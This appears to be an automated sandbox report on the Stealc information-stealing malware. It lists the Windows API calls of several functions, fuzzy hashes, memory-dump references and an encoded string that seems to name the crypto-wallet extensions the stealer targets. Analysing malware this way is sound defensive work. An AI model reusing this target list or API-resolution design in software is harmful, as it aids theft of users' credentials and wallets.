Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 930067d7e8fa68b6bf1f08dd4d5752c6509a664d89c5d4b1c42672f31cc8fb70
Instruction ID: 8fcb13037342cad458f44071bb0b39ea60865adefd4048dba3a17ecc1011addd
Opcode Fuzzy Hash: 930067d7e8fa68b6bf1f08dd4d5752c6509a664d89c5d4b1c42672f31cc8fb70
Instruction Fuzzy Hash: 371182B1949218EBDB249B54DD45F69B778FB04721F104399E51A932C0D7785E40CF91

Function 00787850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 390416d5d46b3593fbd1ec61dcc8c1297b6700ab76227f150ac09c4c0461c824
Instruction ID: 89efc5a98e11ee594976f55ba1c12e4d24b23541116fcdabb367836c847b800b
Opcode Fuzzy Hash: 390416d5d46b3593fbd1ec61dcc8c1297b6700ab76227f150ac09c4c0461c824
Instruction Fuzzy Hash: 71F04FF1D48208ABC714DF98DD49FAEBBB8EB04721F10025AFA05A2680C7785904CBA1

Function 00771160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00786A17,00790AEF), ref: 0077116A
ExitProcess.KERNEL32 ref: 0077117E

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: bfcc879a47b77985f320f3e082994a6f445e15bd83ebb110e97a015ef71b636f
Instruction ID: 994f3756345d7b79028f574be4479b1113f2ac12d4dfa9649f72769ede72e0c2
Opcode Fuzzy Hash: bfcc879a47b77985f320f3e082994a6f445e15bd83ebb110e97a015ef71b636f
Instruction Fuzzy Hash: D0D05E74D0830CDBCB00DFE0D9896DDBBB8FB08321F4006A4D90562340EA315881CBA6

Function 00789C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,00CFBC08), ref: 00789C2D
GetProcAddress.KERNEL32(77190000,00CFBB08), ref: 00789C45
GetProcAddress.KERNEL32(77190000,00CF1FA8), ref: 00789C5E
GetProcAddress.KERNEL32(77190000,00CF1FC0), ref: 00789C76
GetProcAddress.KERNEL32(77190000,00CF1FF0), ref: 00789C8E
GetProcAddress.KERNEL32(77190000,00CF2068), ref: 00789CA7
GetProcAddress.KERNEL32(77190000,00CFA770), ref: 00789CBF
GetProcAddress.KERNEL32(77190000,00CF2080), ref: 00789CD7
GetProcAddress.KERNEL32(77190000,00CF2128), ref: 00789CF0
GetProcAddress.KERNEL32(77190000,00CF2230), ref: 00789D08
GetProcAddress.KERNEL32(77190000,00CF2188), ref: 00789D20
GetProcAddress.KERNEL32(77190000,00CFB9E8), ref: 00789D39
GetProcAddress.KERNEL32(77190000,00CFBB88), ref: 00789D51
GetProcAddress.KERNEL32(77190000,00CFBA08), ref: 00789D69
GetProcAddress.KERNEL32(77190000,00CFBAE8), ref: 00789D82
GetProcAddress.KERNEL32(77190000,00CF2200), ref: 00789D9A
GetProcAddress.KERNEL32(77190000,00CF21D0), ref: 00789DB2
GetProcAddress.KERNEL32(77190000,00CFA608), ref: 00789DCB
GetProcAddress.KERNEL32(77190000,00CFBA88), ref: 00789DE3
GetProcAddress.KERNEL32(77190000,00CF2218), ref: 00789DFB
GetProcAddress.KERNEL32(77190000,00CF21E8), ref: 00789E14
GetProcAddress.KERNEL32(77190000,00CF2248), ref: 00789E2C
GetProcAddress.KERNEL32(77190000,00CF21A0), ref: 00789E44
GetProcAddress.KERNEL32(77190000,00CFBAA8), ref: 00789E5D
GetProcAddress.KERNEL32(77190000,00CF21B8), ref: 00789E75
GetProcAddress.KERNEL32(77190000,00CFF4F8), ref: 00789E8D
GetProcAddress.KERNEL32(77190000,00CFF510), ref: 00789EA6
GetProcAddress.KERNEL32(77190000,00CFF4B0), ref: 00789EBE
GetProcAddress.KERNEL32(77190000,00CFF3F0), ref: 00789ED6
GetProcAddress.KERNEL32(77190000,00CFF450), ref: 00789EEF
GetProcAddress.KERNEL32(77190000,00CFF3D8), ref: 00789F07
GetProcAddress.KERNEL32(77190000,00CFF4C8), ref: 00789F1F
GetProcAddress.KERNEL32(77190000,00CFF420), ref: 00789F38
GetProcAddress.KERNEL32(77190000,00CF48A8), ref: 00789F50
GetProcAddress.KERNEL32(77190000,00CFF5D0), ref: 00789F68
GetProcAddress.KERNEL32(77190000,00CFF5E8), ref: 00789F81
GetProcAddress.KERNEL32(77190000,00CFBB48), ref: 00789F99
GetProcAddress.KERNEL32(77190000,00CFF4E0), ref: 00789FB1
GetProcAddress.KERNEL32(77190000,00CFB888), ref: 00789FCA
GetProcAddress.KERNEL32(77190000,00CFF468), ref: 00789FE2
GetProcAddress.KERNEL32(77190000,00CFF438), ref: 00789FFA
GetProcAddress.KERNEL32(77190000,00CFBAC8), ref: 0078A013
GetProcAddress.KERNEL32(77190000,00CFBB28), ref: 0078A02B
LoadLibraryA.KERNEL32(00CFF5B8,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A03D
LoadLibraryA.KERNEL32(00CFF540,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A04E
LoadLibraryA.KERNEL32(00CFF330,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A060
LoadLibraryA.KERNEL32(00CFF348,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A072
LoadLibraryA.KERNEL32(00CFF480,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A083
LoadLibraryA.KERNEL32(00CFF600,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A095
LoadLibraryA.KERNEL32(00CFF3C0,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A0A7
LoadLibraryA.KERNEL32(00CFF570,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A0B8
GetProcAddress.KERNEL32(77040000,00CFBC28), ref: 0078A0DA
GetProcAddress.KERNEL32(77040000,00CFF618), ref: 0078A0F2
GetProcAddress.KERNEL32(77040000,00CFD8B8), ref: 0078A10A
GetProcAddress.KERNEL32(77040000,00CFF528), ref: 0078A123
GetProcAddress.KERNEL32(77040000,00CFB868), ref: 0078A13B
GetProcAddress.KERNEL32(73D20000,00CFA6F8), ref: 0078A160
GetProcAddress.KERNEL32(73D20000,00CFBD28), ref: 0078A179
GetProcAddress.KERNEL32(73D20000,00CFA7E8), ref: 0078A191
GetProcAddress.KERNEL32(73D20000,00CFF360), ref: 0078A1A9
GetProcAddress.KERNEL32(73D20000,00CFF408), ref: 0078A1C2
GetProcAddress.KERNEL32(73D20000,00CFBF88), ref: 0078A1DA
GetProcAddress.KERNEL32(73D20000,00CFBE88), ref: 0078A1F2
GetProcAddress.KERNEL32(73D20000,00CFF498), ref: 0078A20B
GetProcAddress.KERNEL32(768D0000,00CFBEC8), ref: 0078A22C
GetProcAddress.KERNEL32(768D0000,00CFBD88), ref: 0078A244
GetProcAddress.KERNEL32(768D0000,00CFF378), ref: 0078A25D
GetProcAddress.KERNEL32(768D0000,00CFF558), ref: 0078A275
GetProcAddress.KERNEL32(768D0000,00CFBF08), ref: 0078A28D
GetProcAddress.KERNEL32(75790000,00CFA658), ref: 0078A2B3
GetProcAddress.KERNEL32(75790000,00CFA720), ref: 0078A2CB
GetProcAddress.KERNEL32(75790000,00CFF588), ref: 0078A2E3
GetProcAddress.KERNEL32(75790000,00CFBFE8), ref: 0078A2FC
GetProcAddress.KERNEL32(75790000,00CFBD48), ref: 0078A314
GetProcAddress.KERNEL32(75790000,00CFA4C8), ref: 0078A32C
GetProcAddress.KERNEL32(75A10000,00CFF5A0), ref: 0078A352
GetProcAddress.KERNEL32(75A10000,00CFBDC8), ref: 0078A36A
GetProcAddress.KERNEL32(75A10000,00CFD6E8), ref: 0078A382
GetProcAddress.KERNEL32(75A10000,00CFF390), ref: 0078A39B
GetProcAddress.KERNEL32(75A10000,00CFF3A8), ref: 0078A3B3
GetProcAddress.KERNEL32(75A10000,00CFBEE8), ref: 0078A3CB
GetProcAddress.KERNEL32(75A10000,00CFBC48), ref: 0078A3E4
GetProcAddress.KERNEL32(75A10000,00CFF660), ref: 0078A3FC
GetProcAddress.KERNEL32(75A10000,00CFF690), ref: 0078A414
GetProcAddress.KERNEL32(76850000,00CFBD68), ref: 0078A436
GetProcAddress.KERNEL32(76850000,00CFF6D8), ref: 0078A44E
GetProcAddress.KERNEL32(76850000,00CFF6C0), ref: 0078A466
GetProcAddress.KERNEL32(76850000,00CFF6A8), ref: 0078A47F
GetProcAddress.KERNEL32(76850000,00CFF648), ref: 0078A497
GetProcAddress.KERNEL32(75690000,00CFBFC8), ref: 0078A4B8
GetProcAddress.KERNEL32(75690000,00CFBF48), ref: 0078A4D1
GetProcAddress.KERNEL32(769C0000,00CFBFA8), ref: 0078A4F2
GetProcAddress.KERNEL32(769C0000,00CFF630), ref: 0078A50A
GetProcAddress.KERNEL32(6F8C0000,00CFBEA8), ref: 0078A530
GetProcAddress.KERNEL32(6F8C0000,00CFBDA8), ref: 0078A548
GetProcAddress.KERNEL32(6F8C0000,00CFBF28), ref: 0078A560
GetProcAddress.KERNEL32(6F8C0000,00CFF678), ref: 0078A579
GetProcAddress.KERNEL32(6F8C0000,00CFBE08), ref: 0078A591
GetProcAddress.KERNEL32(6F8C0000,00CFBCC8), ref: 0078A5A9
GetProcAddress.KERNEL32(6F8C0000,00CFBDE8), ref: 0078A5C2
GetProcAddress.KERNEL32(6F8C0000,00CFBC68), ref: 0078A5DA
GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0078A5F1
GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0078A607
GetProcAddress.KERNEL32(75D90000,00CFF6F0), ref: 0078A629
GetProcAddress.KERNEL32(75D90000,00CFD818), ref: 0078A641
GetProcAddress.KERNEL32(75D90000,00CFFD50), ref: 0078A659
GetProcAddress.KERNEL32(75D90000,00CFFD98), ref: 0078A672
GetProcAddress.KERNEL32(76470000,00CFBE68), ref: 0078A693
GetProcAddress.KERNEL32(6FF40000,00CFFE58), ref: 0078A6B4
GetProcAddress.KERNEL32(6FF40000,00CFBF68), ref: 0078A6CD
GetProcAddress.KERNEL32(6FF40000,00CFFE10), ref: 0078A6E5
GetProcAddress.KERNEL32(6FF40000,00CFFD80), ref: 0078A6FD

Strings

InternetSetOptionA, xrefs: 0078A5E5
HttpQueryInfoA, xrefs: 0078A5FC

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: d9232601007fcf0e3d13745e77124f43eaa2abb267a4d2828e3bc11aff1ae9e1
Instruction ID: e2cbec7cdddbe632fb7a0340c72b66694d0c3363c774bcc2207a18f4c84f755c
Opcode Fuzzy Hash: d9232601007fcf0e3d13745e77124f43eaa2abb267a4d2828e3bc11aff1ae9e1
Instruction Fuzzy Hash: 60622BB592C200AFC754DFA8EFC895637F9F74C721724871AA609C3674DA3A9841FB12

Function 00777710 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx,?,007861C4,?), ref: 00777724
RtlAllocateHeap.NTDLL(00000000,?,007861C4,?), ref: 0077772B
lstrcatA.KERNEL32(?,00CFD0F8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 007778DB
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007778EF
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777903
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777917
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 0077792B
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 0077793F
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777952
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777966
lstrcatA.KERNEL32(?,00D00718,?,007861C4,?), ref: 0077797A
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 0077798E
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007779A2
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007779B6
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 007779C9
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 007779DD
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 007779F1
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777A04
lstrcatA.KERNEL32(?,00D00780,?,007861C4,?), ref: 00777A18
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A2C
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A40
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A54
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777A68
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777A7B
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777A8F
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777AA3
lstrcatA.KERNEL32(?,00D007E8,?,007861C4,?), ref: 00777AB6
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777ACA
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777ADE
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777AF2
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777B06
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777B1A
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777B2D
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777B41
lstrcatA.KERNEL32(?,00D00850,?,007861C4,?), ref: 00777B55
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B69
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B7D
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B91
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777BA4
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777BB8
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777BCC
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777BDF
lstrcatA.KERNEL32(?,00D008B8,?,007861C4,?), ref: 00777BF3
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C07
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C1B
lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C2F
lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777C43
lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777C56
lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777C6A
lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777C7E

Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,007917FC,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?,?,007861C4), ref: 00777606
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000), ref: 00777648
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020, : ), ref: 0077765A
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 0077768F
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00791804), ref: 007776A0
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 007776D3
Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00791808), ref: 007776ED
Part of subcall function 007775D0: task.LIBCPMTD ref: 007776FB

lstrcatA.KERNEL32(?,00CFD8E8,?,00000104), ref: 00777E0B
lstrcatA.KERNEL32(?,00D001A0), ref: 00777E1E
lstrlenA.KERNEL32(33548020), ref: 00777E2B
lstrlenA.KERNEL32(33548020), ref: 00777E3B

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Strings

Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx, xrefs: 0077771D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
